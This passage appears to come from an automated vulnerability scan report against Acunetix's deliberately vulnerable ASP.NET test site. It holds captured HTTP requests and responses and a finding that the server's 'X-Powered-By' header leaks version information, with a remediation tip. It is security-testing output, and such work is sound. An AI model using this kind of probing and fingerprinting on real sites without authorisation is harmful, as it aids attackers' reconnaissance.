KQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9jwc%2FcRnTJwdNTwN8SPSTaigKqpw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        35. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCB